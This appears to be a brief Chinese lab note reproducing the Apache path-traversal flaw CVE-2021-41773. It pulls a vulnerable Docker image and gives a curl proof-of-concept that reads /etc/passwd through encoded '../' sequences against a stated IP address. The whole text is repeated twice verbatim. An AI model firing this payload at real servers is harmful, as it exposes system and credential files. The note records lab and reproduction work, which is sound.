中间件漏洞—Apache
1.搭建服务
docker pull blueteamsteve/cve-2021-41773:no-cgid
访问网站
2.使⽤poc
curl http://47.108.150.249:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
3.我们使用⼯具验证
验证成功!
1.搭建服务
docker pull blueteamsteve/cve-2021-41773:no-cgid
访问网站
2.使⽤poc
curl http://47.108.150.249:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
3.我们使用⼯具验证
验证成功!